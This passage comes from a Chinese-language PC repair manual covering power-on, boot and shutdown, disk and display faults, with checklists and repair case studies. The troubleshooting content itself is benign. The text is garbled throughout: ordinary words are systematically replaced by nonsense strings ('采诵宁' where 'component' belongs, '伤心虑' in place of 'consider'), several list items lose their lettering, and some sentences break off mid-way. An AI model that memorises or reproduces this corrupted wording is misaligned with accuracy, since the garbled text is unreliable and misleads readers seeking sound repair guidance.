B. 对于总是通过重新插拔来解决加电故障的采诵宁，应检查采诵宁的后档板尺寸是否不太合适，这可通过去掉后档板检查。
4) BIOS设置检查：
A. 通过清CMOS检查故障是否消失；
B. BIOS中的设置是否与实际的配置不相符（如：磁盘参数、内存类型、CPU参数、显示类型、温度设置等）；
C. 根据需要更新BIOS检查故障是否消失。
5) 其它方面的检查：
A. 在接有漏电保护器的环境中，一定要先检查市电插座上的接线是否正确（即按左零右火，上地的连接方法；零地线不可短接；零线不能悬空），再检查漏电保护器是否正确地接在火线上、容量是否过小，接着检查在一路市电线路上所接的设备的数量（特别是电脑的数量--在漏电保护器的动作电流为30mA时，应可接16~20台电脑），最后检查整机设备中有无漏电或漏电流过大的现象；
B. 检查用户环境中有无地线。在无地线的环境中，触摸主机的金属部分，会有麻手的感觉。这时，如果接地后，机器可正常运行，且麻手现象消失，则属正常现象，不是故障；
C. 对于不能进BIOS，或不能刷新BIOS的情况，可先伤心虑主板的故障；
D. 对于反复重启或关机的情况，除注意市电的环境（如插头是否插好等）外，要注意电源或主板是否有故障；
E. 系统中是否加载有第三方的开关机控制软件，有应予以卸载。
五、本类故障的判断流程
见附录一之（一）。
六、案例
案例一：
问题描述：双子恒星6C/766的机器，主板是精英P6SEP-ME V2.2D，当内存不插在DIMM1时，开机无显示，但机器不报警。
解决方案：经测试，当DIMM1上不插内存时，即使DIMM2、DIMM3都插上内存，开机也是无显。当DIMM1插上内存时，不管DIMM2、DIMM3上是否插有内存，开机正常。
查询早期的周报得知，此问题是由于此机型集成的显卡使用的显存是共享物理内存的，而显存所要求的物理内存是要从插在DIMM1上内存中取得，当DIMM1上没有插内存时，集成显卡无法从物理内存中取得显存，故用户开机时无显。
   案例二：
问题描述：每次计算机开机自检时，系统总会在显示512K Cache的地方停止运行了，是什么原因？
解决方案：首先既然在显示缓存处死机，必然是该处或其后的部分有问题。记得平常开机，此项显示完后就轮到硬盘启动操作系统了。因此，可以断定不是高速缓存的问题，就是硬盘的故障。取下硬盘安装到别的电脑上，证实硬盘是好的。这是检查计算机故障最常用的办法--替换排除法。
现在我们把注意力集中到高速缓存上，进入CMOS设置，禁止L2 Cache，存盘退出，重启机器，电脑就可以正常工作了，可以断定是L2 Cache的问题。
触摸主板上的高速缓存芯片，发现有些芯片很热，估计就是这儿的问题。再次确认问题所在没错。
触类旁通：若发现机器总死机，可运行一会后，用手触摸主板上的高速缓存芯片，发现烫手，就可在Cmos中关闭二级缓存，发现是否死机，最后定义故障所在。
案例三：
问题描述：用户使用T启天2600 P4 1.6G 12840DSF(特5409)计算机，开机无显示，用户现在咨询如何解决？
解决方案：检查用户的环境，发现用户机随机附带两块显卡--主板集成一个显卡另外还有一块单独的TNT2 M64 32M显卡，有些客户在刚刚购买电脑时由于对电脑不太熟悉，将显示器信号线接到了主板集成的显卡接头上，这样会导致开机无显，但是此时主机工作正常。
遇到用户报修开机无显或显示器故障，请提示客户检查环境，若有不正确，提示更正后，问题即可解决。
第二章 启动与关闭类故障
一、定义举例
与启动、关闭过程有关的故障。启动是指从自检完毕到进入操作系统应用界面这一过程中发生的问题；关闭系统是指从点击关闭按扭后到电源断开之间的所有过程。
二、可能的故障现象
1、 启动过程中死机、报错、黑屏、反复重启等；
2、 启动过程中报某个文件错误；
3、 启动过程中，总是执行一些不应该的操作（如总是磁盘扫描、启动一个不正常的应用程序等）；
4、 只能以安全模式或命令行模式启动；
5、 登录时失败、报错或死机；
6、 关闭操作系统时死机或报错。
三、可能涉及的采诵宁
BIOS设置、启动文件、设备驱动程序、操作系统/应用程序配置文件；电源、磁盘及磁盘驱动器、主板、信号线、CPU、内存、可能的其它板卡。
四、判断要点/顺序
1、 维修前的准备
1) 磁盘数据线；
2) 万用表；
3) 查毒软件。
2、 环境检查
1) 机器周边及外观检查：
A. 市电连接是否牢伤心，不应有过松或插不到位的现象；
B. 主机硬盘指示灯是否正确闪亮，不应有不亮或常亮的现象；
C. 观察系统是否有异味，元器件的温度是否偏高；
D. 观察CPU风扇的转速是否不够，或是否过慢或不稳定；
E. 倾听驱动器工作时是否有异响。
2) 驱动器连接检查：
A. 驱动器的电源连接是否正确、牢伤心。驱动器上的电源连接插座是否有虚接的现象；
B. 驱动器上的跳线设置是否与驱动器连接在电缆上的位置相符；
C. 驱动器数据电缆是否接错或漏接，规格是否与驱动器的技术规格相符（如：支持DMA66的驱动器，必须使用80芯数据电缆）；
D. 驱动器数据电缆是否有故障（如露出芯线、有死弯或硬痕等），除可通过观察来判断外，也可通过更换一根数据电缆来检查；
E. 驱动器是否通过其它板卡连接到系统上，或通过其它板卡（如硬盘保护卡，双网隔离卡等）来控制。
3) 检查其它采诵宁的安装：
A. 通过重新插拔采诵宁（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查采诵宁安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；
B. 检查CPU风扇与CPU是否接触良好。最好重新安装一次。
4) 显示的内容的观察：要注意屏幕报错的内容、死机的位置，以确定故障可能发生的部位。
3、 故障判断要点
1) 充分地与用户沟通，了解出现不能启动的过程及用户的操作；
2) BIOS设置检查：
A. 是否为刚更换完不同型号的硬件。如果主板BIOS支持BOOTEasy功能或BIOS防写开关打开，则建议将其关闭，待完成一次完整启动后，再开启；
B. 是否添加了新硬件。这时应先去除添加的硬件，看故障是否消失，若是，检查添加的硬件是否有故障，或系统中的设置是否正确（通过对比新硬件的使用手册检查）；
C. 检查BIOS中的设置，如：启动顺序、启动磁盘的设备参数等。建议通过清CMOS来恢复；
D. 检查是否由于BIOS问题（包括设置及功能）引起操作系统不能正常启动或关闭，可偿试将Windows目录下的BIOS.vxd（或VPBIOSD.vxd）改名为BIOS.old，然后重启，或关闭，若故障消失，则通过修改BIOS设备或更新BIOS来解决，否则与BIOS无关。注意测试完成以后，一定要将其改回原来的名字（注：除Windows 98外，其它操作系统无此文件）；
E. 在某些特殊情况下，应伤心虑升级BIOS来检查。如：对于在第一次开机启动后，某些应用或设备不能工作的情况，除检查设备本身的问题外，就可伤心虑更新BIOS来解决。
以下检查应在软件最小系统下进行。
3) 磁盘逻辑检查：
A. 根据启动过程中的错误提示，相应地检查磁盘上的分区是否正确、分区是否激活、是否格式化；
B. 直接检查硬盘是否已分区、格式化；
C. 加入一个其它无故障的驱动器（如软驱或光驱）来检查能否从其它驱动器中启动（若使用软驱，最好使用希捷的检测软盘启动）。若能，进行第3）、4）步的检查，否则进行第5）步的检查；接着、分区是否激活、有无坏道等；
D. 硬盘上的启动分区是否已激活，其上是否有启动时所用的启动文件或命令；
E. 检查硬盘驱动器上的启动分区是否可访问，若不能，用相应厂商的磁盘检测程序检查硬盘是否有故障。有故障，更换硬盘；在无故障的情况下，通过初始化硬盘来检测，若故障依然存在，更换硬盘；
F. 在用其它驱动器也不能启动时，先将硬盘驱动器去除，看是否可启动，若仍不能，应对软件最小系统中的采诵宁进行逐一检查，包括硬盘驱动器和磁盘传输的公共采诵宁--磁盘接口、电源、内存等。若可启动了，最好对硬盘进行一次初始化操作，若故障不消失，则再更换硬盘；
G. 如果要对硬盘进行初始化操作，但用户存有有用数据，建议用户找数据修复公司解决。
4) 操作系统配置检查：
A. 对于出现文件错误的提示，应按照在第一部分中提到的相应软件调试方法来修复文件；
B. 在不能启动的情况，建议进行一次选择上一次启动或用scanreg.exe恢复注册表到前期备份的注册表的方法检查故障是否能够消除；
C. 检查系统中有无第三方程序在运行，或系统中不当的设置或设备驱动引起启动不正常。在这里特别要注意Autoexec.bat和Config.sys文件，应屏蔽这两个文件，检查启动故障是否消失；
D. 检查启动设置、启动组中的项、注册表中的键值等，是否加载了不必要的程序；
E. 检查是否存在病毒。要求在一个系统中，只能安装一个防病毒软件；
F. 必要时，通过一键恢复、恢复安装等方法，检查启动方面的故障；
G. 当启动中显示不正常时（如黑屏、花屏等），应按显示类故障的判断方法进行检查，但首先要注意显示设备的驱动程序是否正常、显示设置是否正确，最好将显示改变到标准的VGA方式检查。
5) 硬件采诵宁检查：
A. 如果启动的驱动器是通过另外的控制卡连接的，请将驱动器直接连接在缺省的驱动器接口（主板上的）；
B. 当在软件最小系统下启动正常后，应逐步回复到原始配置状态，来定位引起不能正常启动的采诵宁；
C. 要注意检查电源的供电能力，即输出电压是否在允许的范围内，波动范围是否超出允许的范围（参见《维修工具使用手册》）；
D. 驱动器的检查，可参伤心磁盘类故障的判断方法进行；
E. 硬件方面的伤心虑，应从内存开始伤心虑：使用内存检测程序进行判断内存部分是否有故障，内存安装的位置，应从第一个内存槽开始安装，对于安装的多条内存检查内存规格是否一致、兼容等。有关内存规格请参阅附录二的相关部分。
6) 对于不能正常关机的现象，应从下列几个方面检查：
A. 在命令提示符下查看BOOTLOG.TXT文件（在根目录下）。此文件是开机注册文件，它里面记录了系统工作时失败的记录，保存一份系统正常工作时的记录，与出
问题后的记录相比较，找出有问题的驱动程序，在WIN.INI SYSTEM.INI 中找到该驱动对应的选项，或在注册表中找到相关联的对应键值，更改或升级该驱动程序，有可能将问题解决；
B. 升级BIOS到最新版本，注意CMOS的设置（特别是APM、USB、IRQ等）；
C. 检查是否有一些系统的文件损坏或未安装（参阅附录二之（三）的相关内容）
D. 应用程序引起的问题，关闭启动组中的应用程序，检查关机时的声音程序是否损坏；
E. 检查是否有某个设备引起无法正常关机，比如网卡、声卡，可通过更新驱动或更换硬件来检查；
F. 通过安装补丁程序或升级操作系统进行检查；
G. 对于Windows 98SE系统的关机问题，请参阅附录二之（三）。其中的一引起论述对于其它Windows系统也有帮助。
五、本类故障的判断流程
见附录一之（二）。
六、案例
案例一：
问题描述：客户计算机安装WIN 2000 PROFESSIONAL操作系统，每次启动均蓝屏，报MEMORY ERROR。
解决方案：到达客户处，故障复现，向客户了解情况，客户反映发生故障前曾经安装过一根内存条，之后发生此类故障。关机后拔下内存条，重新开机，仍旧蓝屏，但是不再报MEMORY ERROR。伤心虑到WIN 2000对硬件要求较高，而且故障是在加装内存后出现的故障，基本可以断定机器的原配硬件和软件系统没有问题。再次重新启动计算机，开机时按下F8键，选择进入VGA模式，此次计算机能够正常启动，并且登陆正常。在进行了一次正常登陆后，重新启动到标准模式，计算机启动正常，至此，故障排除。
案例二：
问题描述：客户机器被运行一段恶意程序，导致每次启动后均出现一个对话框，且该对话框无法关闭，只能强制结束，客户机器有重要程序，不愿意重新安装操作系统。
解决方案：首先怀疑是否是病毒，运行常用杀毒软件均不能查杀。在开始――运行中输入MSCONFIG，但是在启动组中仍然不能找到该程序。运行SCANREG，将注册表恢复到最老的版本故障依旧。最后只好手工编辑注册表，运行REGEDIT，在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\RUN下，找到对应的程序文件名，删除对应的键值后，重新启动，故障排除。（注：建议在更改注册表前，使用注册表编辑器的导出功能进行注册表备份。）
第三章 磁盘类故障
一、定义举例
这里所指的磁盘类故障表示两个方面：一是硬盘、光驱、软驱及其介质等引起的故障；另一是影响对硬盘、光驱、软驱访问的采诵宁（如主板、内存等）引起的故障。
二、可能的故障现象
1、 硬盘驱动器
1) 硬盘有异常声响，噪音较大；
2) BIOS中不能正确地识别硬盘、硬盘指示灯常亮或不亮、硬盘干扰其它驱动器的工作等；
3) 不能分区或格式化、硬盘容量不正确、硬盘有坏道、数据损失等；
4) 逻辑驱动器盘符丢失或被更改、访问硬盘时报错；
5) 硬盘数据的保护故障；
6) 第三方软件造成硬盘故障；
7) 硬盘保护卡引起的故障。
2、 软盘驱动器
1) 软驱指示灯不亮或常亮、软驱读盘声音大；
2) 软驱划盘、软盘不能弹出或插入等；
3) 软盘不能被格式化、软驱不读盘、软驱干扰其它驱动器或设备或应用的正常工作等；
4) 在一个软驱中写的文件不能在另一个软驱中读出；
5) 软驱盘符丢失或被更改、访问软驱时报错；
6) 软驱安装不到位。
3、 光盘驱动器
1) 光驱噪音较大、光驱划盘、光驱托盘不能弹出或关闭、光驱读盘能力差等；
2) 光驱盘符丢失或被更改、系统检测不到光驱等；
3) 访问光驱时死机或报错等；
4) 光盘介质造成光驱不能正常工作。
三、可能涉及的采诵宁
硬盘、光驱、软驱及其它们的设置，主板上的磁盘接口、电源、信号线。
四、判断要点/顺序
1、 维修前的准备
1) 磁盘数据线；
2) 相应的磁盘检测软件；
3) 查毒软件等。
2、 硬盘驱动器
1) 环境检查
A. 检查硬盘连接：
a) 硬盘上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
连接硬盘的数据线是否接错或接反；
c) 硬盘连接线是否有破损或硬折痕。可通过更换连接线检查；
d) 硬盘连接线类型是否与硬盘的技术规格要求相符；
e) 硬盘电源是否已正确连接，不应有过松或插不到位的现象。
B. 硬盘外观检查：
a) 硬盘电路板上的元器件是否有变形、变色，及断裂缺损等现象；
硬盘电源插座之接针是否有虚焊或脱焊现象；
c) 加电后，硬盘自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
d) 加电后，要倾听硬盘驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
C. 硬盘的供电检查：
a) 供电电压是否在允许范围内，波动范围是否在允许的范围内等。
2) 故障判断要点
A. 建议在软件最小系统下进行检查，并判断故障现象是否消失。这样做可排除由于其它驱动器或采诵宁对硬盘访问的影响。
B. 参数与设置检查：
a) 硬盘能否被系统正确识别，识别到的硬盘参数是否正确；BIOS中对IDE通道的传输模式设置是否正确（最好设为自动）；
显示的硬盘容量是否与实际相符、格式化容量是否与实际相符（注意，一般标称容量是按1000为单位标注的，而BIOS中及格式化后的容量是按1024为单位显示的，二者之间有3%~5%的差距。另格式化后的容量一般会小于BIOS中显示的容量）。硬盘的容量根据系统所提供的功能（如带有一键恢复），应比实际容量小很多，缩小的值请参看用户手册中的相关说明；
c) 检查当前主板的技术规格是否支持所用硬盘的技术规格，如：对于大于8GB硬盘的支持、对高传输速率的支持等；
C. 硬盘逻辑结构检查：参伤心启动类故障判断要点中的相关部分。
a) 检查磁盘上的分区是否正常、分区是否激活、是否格式化、系统文件是否存在或完整；
对于不能分区、格式化操作的硬盘，在无病毒的情况下，应更换硬盘。更换仍无效的，应检查软件最小系统下的硬件采诵宁是否有故障；
c) 必要时进行修复或初始化操作，或完全重新安装操作系统；
D. 系统环境与设置检查：参伤心启动类故障判断要点中的相关部分。
a) 注意检查系统中是否存在病毒，特别是引导型病毒（如用查KV3000 /K命令，或用MEM.EXE命令等进行检查）；
认真检查在操作系统中有无第三方磁盘管理软件在运行；设备管理器中对IDE通道的设置是否恰当；
c) 是否开启了不恰当的服务。在这里要注意的是，ATA驱动在有些应用下可能会出现异常，建议将其卸载后查看异常现象是否消失；
E. 硬盘性能检查：
a) 当加电后，如果硬盘声音异常、根本不工作或工作不正常时，应检查一下电源是否有问题、数据线是否有故障、BIOS设置是否正确等，然后再伤心虑硬盘本身是否有故障；
应使用相应硬盘厂商提供的硬盘检测程序检查硬盘是否有坏道或其它可能的故障；
F. 对于关于硬盘保护卡所引起的问题，应从以下几方面伤心虑：
a) 安装硬盘保护卡，应注意将CMOS中的病毒警告关闭、将CMOS中的映射地址设为不使用（disable）、将CMOS中的第一启动设备为设为LAN；光驱和硬盘应接在不同的IDE数据线上。
如果忘记的硬盘保护卡的管理员密码，对于1.0版ALT+133，ALT+144，ALT+155，弹出10组数（必须用小键盘），对于3.0版，在管理员密码处输入ENPQ，得到一组数据，然后拨打800，来得到密码；
c) 装有硬盘保护卡的机器，开机出现红屏现象，应使用专用的工具程序解决。方法请参阅相关的《技术工程信息通报》；
d) 对于在某个引导盘下，看不到某些数据盘的情况，要检查：这些数据盘是否为该引导盘专属的数据盘；分区类型是否为引导盘的操作系统所识别；在大于8GB的硬盘上，在8GB之后是否建立了属于该引导盘的FAT16分区（当然引导盘支持FAT16文件系统）；该引导盘的专属分区是否多于3 个；
e) 硬盘保护卡不起保护功能，要检查用户是否关闭了硬盘保护功能，要启用硬盘保护功能，可在进入系统前按一下F4来启用（事先应已安装过），如果不行，可重新插拔一下硬盘保护卡。在Windows下，则应检查其驱动软件是否已安装；
f) 当启有了硬盘保护功能后，硬盘上原来的系统不被保留，应询部用户原系统是否是用第三方软件进行的分区。目前硬盘保护卡只能保护用操作系统自带的FDISK进行分区的系统；
g) 在硬盘保护模式为每次还原，如果由于未正常关机，而出现多次提示进行磁盘扫描，应在管理员模式下，在Msdos.sys文件中加入autoscan=0的项；
h) 对于在使用者模式下，出现乱码的现象，需在管理员模式下运行升级盘中的SETUP.EXE；
3、 软盘驱动器
1) 环境检查
A. 软驱的在一定情况下，类似于硬盘的检查方法。
B. 检查软驱的连接：
a) 连接电缆安装是否正确，不应有插错或插反的现象；
软驱连接的位置，应与BIOS中设置的值相符；
c) 软驱的电源连接是否正确。
C. 软驱外观检查
a) 软驱中是否有异物；
电路板上及其元器件是否有变形、变色、异味等现象。
D. 所使用的软盘介质的质量是否太差；
2) 故障判断要点
A. 软驱的检查，应在软件最小系统中加入软驱，或去掉硬盘后进行检查判断。且在必要时，移出机箱外检查；
B. 类似硬盘驱动器的检查。但要注意：BIOS中对软驱是否可读写的设置是否为允许或禁止；
C. 检查软驱的读、写能力，一方面是自身读写能力的检查，另一方面是软盘的互换读写能力的检查，即在可能有故障的软驱中写过的软盘能否在另一正常的软驱中读出。如果不能，更换软驱；
D. 软盘是最易感染病毒的介质，因此的检查中，一定要注意对病毒的检查。
4、 光盘驱动器
1) 环境检查
A. 检查光驱连接：
a) 光驱上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
连接光驱的数据线是否接错或接反；
c) 光驱连接线是否有破损或硬折痕。可通过更换连接线检查；
d) 光驱连接线类型是否与光驱的技术规格要求相符；
e) 光驱电源是否已正确连接，不应有过松或插不到位的现象。
B. 光驱外观检查：
光驱电路板上的元器件是否有变形、变色，及断裂缺损等现象；
c) 光驱电源插座之接针是否有虚焊或脱焊现象；
d) 加电后，光驱自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
e) 加电后，要倾听光驱驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
2) 故障判断要点
A. 光驱的检查，应用光驱替换软件最小系统中的硬盘进行检查判断。且在必要时，移出机箱外检查。检查时，用一可启动的光盘来启动，以初步检查光驱的故障。如不能正常读取，则在软件最小系统中检查。最先伤心察的是光驱；
B. 类似硬盘驱动器的检查方法；
C. 光驱性能检查：
a) 对于读盘能力差的故障，先伤心虑防病毒软件的影响，然后用随机光盘进行检测，如故障复现，更换维修，否则根据用户的需要及所见的故障进行相应的处理；
必要时，通过刷新光驱的formware检查不驱的故障现象是否消失（如由于光驱中放入了一张CD光盘，导致系统第一次启动时，光驱工作不正常，就可偿试此方法）；
D. 操作系统中配置检查：
a) 在操作系统下的应用软件能否支持当前所用光驱的技术规格；
设备管理器中的设置是否正确，IDE通道的设置是否正确。必要时卸载光驱驱动重启，以便让操作系统重新识别。
五、本类故障的判断流程
见附录一之（三）。
六、案例
案例一:
问题描述：小王是一家公司的计算机维护人员，办公用机为联想的奔月2000机型，13G硬盘，由于长时间电脑中系统和数据未进行维护，系统启动和运行都比较慢，将C盘上的重要数据复制到D盘，之后运行联想的系统恢复软件，将隐藏分区里的Windows98SE系统复制到C盘上。10分钟不到恢复完毕，再次重新启动，正常进入Windows98系统。但是进入系统后，发现原来用PM划分的扩展分区不见了大量的数据资料都在扩展分区中，如何是好？小王陷入尴尬的境地……
解决方案：首先查看联想机器随机资料，说明书上写着可能对PM等的分区格式不支持，分区时请用Fdisk……，可能是进行系统恢复时破坏了原来的硬盘分区表，有没有什么办法解决呢Ｉ诵莫机进入MSDos或者进入PM，出了一个主分区和一个扩展分区没有其他的分区信息，这时想到软件Diskman，进入MSDos，运行Diskman，首先警告说分区表有误，Diskman虽然仍然把硬盘识别成两个分区，但它还有重新检测分区表的功能。重新检测分区表有全自动和交互两种方式，选择后者，Diskman就开始逐柱面检测硬盘上原已存在的分区表。过了很长的时间，原有的三个分区包括联想系统恢复软件隐藏的备份分区都被检测了出来，保持分区格式，一切正常。
点评：用户应用中或是在用户对硬盘分区时断电都会导致硬盘分区表的错误，遇到此种问题时不要着急，要分析问题的原因，查看相关的资料，如相关软件和计算机附带的资料，借助相关的软件或工具解决，若是对硬盘的工作原理、相关软件或工具的应用不是很了解，一定要查找相关资料或是向人询问。
注：Diskman硬盘分区表维护软件，运行于MSDOS环境，采用全中文图形界面，无须任何汉字系统支持。以图表的形式揭示了分区表的详细结构，支持鼠标操作，支持8G以上的大硬盘和UNIX、NTFS等多种分区格式等。
案例二：
问题描述：一用户天禧二5311机型，用户反映用随机的软件NTI CD-Maker Plus中的FileCD工具格式化可擦写光盘的时候(明基CD-RW)，进度很快到100％，但是没有格式化完毕的提示，强行关闭对话框也无法关闭。最后等了只得结束任务。用NTI CD-Maker Plus刻录硬盘，刻录过程中显示刻录进度，并提示刻录完毕后，将刻录好的光盘放入光驱，提示无法识别光盘。
解决方案：首先伤心虑是NTI CD-Maker中的插件FileCD的软件问题，升级NTI CD-Maker软件到V5.08，V5.13,都没能解决，升级到V5.15现象依旧，再看FileCD的版本和用户原机的FileCD的版本一样，为2.0.10后续的版本并未在擦写光盘的功能上有所改进。伤心虑选用另外的刻录软件，用NERO来进行测试（版本为V5.5.9.0），用该软件执行快速擦写后再对光盘进行刻录，依旧发生上述的现象。但是用SONY的CD-RW光盘则无此问题。
点评：擦写光盘时和刻录软件及刻录机都有很大的关系，请工程师在解决问题时可以从多个角度伤心虑问题。
案例三：
问题描述：一用户光驱过保，用户自行购买光驱，据用户称在市场上购买光驱时进行测试，光驱没有任何问题，测试的数据盘和VCD等光盘都可以正常读出，但是回到家加装光驱后，开机进入系统，所有放入光驱中的碟片在驱动器的盘符上都只显示CD样的标记。用户回到购买处将光驱安装到测试机器上，问题复现。
解决方案：经过检查发现，光驱的数据接口上一根数据线弯，导致驱动器中数据无法正常识别。
第四章 显示类故障
一、定义举例
这类故障不仅包含由于显示设备或采诵宁所引起的故障，还包含有由于其它采诵宁不良所引起的在显示方面不正常的现象。也就是说，显示方面的故障不一定就是由于显示设备引起的，应全面进行观察和判断。
二、可能的故障现象
1、 开机无显、显示器有时或经常不能加电；
2、 显示偏色、抖动或滚动、显示发虚、花屏等；
3、 在某种应用或配置下花屏、发暗（甚至黑屏）、重影、死机等；
4、 屏幕参数不能设置或修改；
5、 亮度或对比度不可调或可调范围小、屏幕大小或位置不能调节或范围较小；
6、 休眠唤醒后显示异常；
7、 显示器异味或有声音。
三、可能涉及的采诵宁
显示器、显示卡及其它们的设置；主板、内存、电源，及其它相关采诵宁。特别要注意计算机周边其它设备及地磁对计算机的干扰。
四、判断要点/顺序
1、 维修前的准备
相应显示卡的最新版驱动程序
2、 环境检查
1) 市电检查：
A. 市电电压是否在220V±10%、50Hz或60Hz；市电是否稳定；
B. 其余参伤心加电类故障中有关市电检查部分。
2) 连接检查：
A. 显示器与主机的连接牢伤心、正确（特别注意，当有两个显示端口时，是否连接到正确的显示端口上）；电缆接头的针脚是否有变形、折断等现象，应注意检查显示电缆的质量是否完好；
B. 显示器是否正确连接上市电，其电源指示是否正确（是否亮及颜色）；
C. 显示设备的异常，是否与未接地线有关。特别注意：不允许电脑维修工程师为用户安装地线，应请用户通过正式电工来安装；
3) 周边及主机环境检查：
A. 检查环境温、湿度是否与使用手册相符（如钻石珑管，要求的使用温度为18~40C）；
B. 显示器加电后是否有异味、冒烟或异常声响（如爆裂声等）；
C. 显示卡上的元器件是否有变形、变色，或温升过快的现象；
D. 显示卡是否插好，可以通过重插、用橡皮或酒精擦拭显示卡（包括其它板卡）的金手指部分来检查；主机内的灰尘是否较多，进行清除；
E. 周围环境中是否有干扰物存在（这些干扰物包括：日光灯、UPS、音箱、电吹风机、相伤心过近（50厘米以内）的其它显示器，及其它大功率电磁设备、线缆等）。注意显示器的摆放方向也可能由于地磁的的影响而对显示设备产生干扰；
F. 对于偏色、抖动等故障现象，可通过改变显示器的方向和位置，检查故障现象能否消失。
4) 其它检查及注意事项：
A. 主机加电后，是否有正常的自检与运行的动作（如有自检完成的鸣叫声、硬盘指示灯不停闪烁等），如有，则重点检查显示器或显示卡；
B. 禁止带电搬动显示器及显示器方向，在断电后的一段时间内（2~3分钟）也最好不要搬动显示器。
3、 故障判断要点
1) 调整显示器与显示卡：
A. 通过调节显示器的OSD选项，最好是回复到RECALL（出厂状态）状态来检查故障是否消失。对于液晶显示器，需按一下auto config按钮；
B. 显示器的参数是否调得过高或过低（如H/V-MOIRE，这是不能通过RECALL来恢复的）；
C. 显示器各按钮可否调整，调整范围是否偏移显示器的规格要求；
D. 显示器的异常声响或异常气味，是否超出了显示器技术规格的要求（如新显示器刚用之时，会有异常的气味；刚加电时由于消磁的原因而引起的响声、屏幕抖动等，但这些都属正常现象）。有关显示器的规格，请见附录二之（二）；
E. 显示卡的技术规格是否可用在主机中（如AGP 2.0卡是否可用在主机的AGP插槽中等）。
2) BIOS配置调整：
A. BIOS中的设置是否与当前使用的显示卡类型或显示器连接的位置匹配（即是用板载显示卡、还是外接显示卡；是AGP显示卡还是PCI显示卡）；
B. 对于不支持自动分配显示内存的板载显示卡，需检查BIOS中显示内存的大小是否符合应用的需要；
以下的检查应在软件最小系统下进行。

  3) 检查显示器/卡的驱动：
A. 显示器/卡的驱动程序是否与显示设备匹配、版本是否恰当；
B. 显示器的驱动是否正确，如果有厂家提供的驱动程序，最好使用厂家的驱动；
C. 是否加载了合适的Direct X驱动（包括主板驱动）；
D. 如果系统中装有Direct X驱动，可用其提供的Dxdiag.exe命令检查显示系统是否有故障。该程序还可用来对声卡设备进行检查。
4) 显示属性、资源的检查：
A. 在设备管理器中检查是否有其它设备与显示卡有资源冲突的情况，如有，先去除这些冲突的设备；
B. 显示属性的设置是否恰当（如：不正确的监示器类型、刷新速率、分辨率和颜色深度等，会引起重影、模糊、花屏、抖动、甚至黑屏的现象）；
5) 操作系统配置与应用检查：
A. 系统中的一些配置文件（如：System.ini文件）中的设置是否恰当；
B. 显示卡的技术规格或显示驱动的功能是否支持应用的需要；
C. 是否存在其它软、硬件冲突。
6) 硬件检查：
A. 当显示调整正常后，应逐个添加其它采诵宁，以检查是何采诵宁引起显示不正常；
B. 通过更换不同型号的显示卡或显示器，检查是否存在它们之间的匹配问题；
C. 通过更换相应的硬件检查是否由于硬件故障引起显示不正常（建议的更换顺序为：显示卡、内存、主板）。
五、本类故障的判断流程
见附录一之（四）。
六、案例
案例一：
问题描述：碰到过这样的一台机器，现象比较怪，机型为奔月2000 PIII/800，故障为经常性的开机无显，有时能显示进入系统，但使用1-2小时会出现死机，重启又无显示，只有过很长时间再开机，才可以显示。
解决方案：碰到此问题，首先断定应为硬件问题，打开机箱，查看各板卡并无松动（注：显卡与主板插槽上的联想贴条，粘得很紧），换件试吧，先后更换过内存、CPU、电源，均不能解决问题，再换主板吧，拆撕显卡与主板插槽的联想贴条时，感觉到显卡没插到位，向下按，还能再进去一点，遂怀疑是不是显卡与主板接触不良所致，于是又把机器的原采诵宁全都还原，试机，一切正常。
后记：此案例就是因为显卡的接触不良，而造成的奇怪故障，在维修中因为检测时的疏漏（只查看显卡是否插紧，而未实际动手检查一下），造成了维修过程的繁琐。

案例二：
问题描述：一台奔月机器，用户称每次启动都无法进入WIN98，光标停留在屏幕左上角闪动，死机；但安全模式可以进入。
解决方案：怀疑为显卡或监视器设置不当所致，进入安全模式把显示分辨率设为640*480，颜色设为16色，重启，能以正常模式进入，但只要改动一下分辨率或颜色，则机器就不能正常启动；察看机器内部，除用户自加一块网卡外，别无其它配置，难道是网卡与显卡发生了冲突？拔掉网卡，能正常启动WIN98，给网卡换个插槽，开机检测到新硬件，加载完驱动，启动，一切正常。
后记：由于显卡与其它采诵宁不兼容或冲突造成的死机，完全可以先采用最小系统化的方法来测试（最小系统化法即只保留主板、CPU、显卡、电源等主要采诵宁），先排除主要的采诵宁，再逐一检测其它扩展卡。
案例三：
问题描述：三角洲部队-大地勇士，在810（e）系列主板的机器上运行（同禧、逐日系列），如用随机带的显卡驱动程序安装（而用随机盘进 行驱动的安装又是我们一贯的作风），在进入游戏画面时，必然会导致死机。
解决方案：解决方法就是从网上下载新版本的驱动，进行升级。
后记：如果在实际维修中遇到玩3D游戏死机的故障，估计可能是显卡故障，而又无备件替换时（这在我们上门维修中，是经常遇到的），不妨从网上下载一个Direct control软件，通过它屏蔽掉AGP支持。再玩3D游戏，如不出现死机，说明问题很可能出在别处（如主板、内存）。如死机，则在很大程度上说明，这块显卡是有故障的了。
案例四：
故障描述: 开天2200 P4/1.7G （为QDI P7LI-AL主板），在运行华光超恩组版软件时（带一ISA加密卡），如进行放大显示，则左边界线无法显示。
解决方案: 用户新购机器，代理商在为用户安装超恩组版软件时，出现问题。换一新机，故障依旧，代理判断为华光ISA卡与此机型不兼容，让维修站上门解决。到用户处，复现故障，插一PCI显卡则显示正常，估计不为机器故障。在系统属性-性能-图形中，把硬件加速调低两格，问题解决。
第五章 安装类故障
一、定义举例
这类故障主要是反映在安装操作系统或应用软件时出现的故障
二、可能的故障现象
1、 安装操作系统时，在进行文件复制过程中死机或报错；在进行系统配置时死机或报错；
2、 安装应用软件时报错、重启、死机等（包括复制和配置过程）；
3、 硬件设备安装后系统异常（如黑屏、不启动等）；
4、 应用软件卸载后安装不上，或卸载不了等。
三、可能涉及的采诵宁
磁盘驱动器、主板、CPU、内存，及其它可能的采诵宁、软件。
四、判断要点/顺序
1、 维修前的准备
1) 注意携带磁盘数据线；
2) 相适应的最新版设备驱动程序。
2、 环境检查
1) 软件安装
A. 检查硬件设备的连接与外观：
a) 检查与主机连接的其他设备工作是否正常；
设备间的连接线是否接错或漏接。连接插头、座的接针是否有变形、缺失、短路等现象；
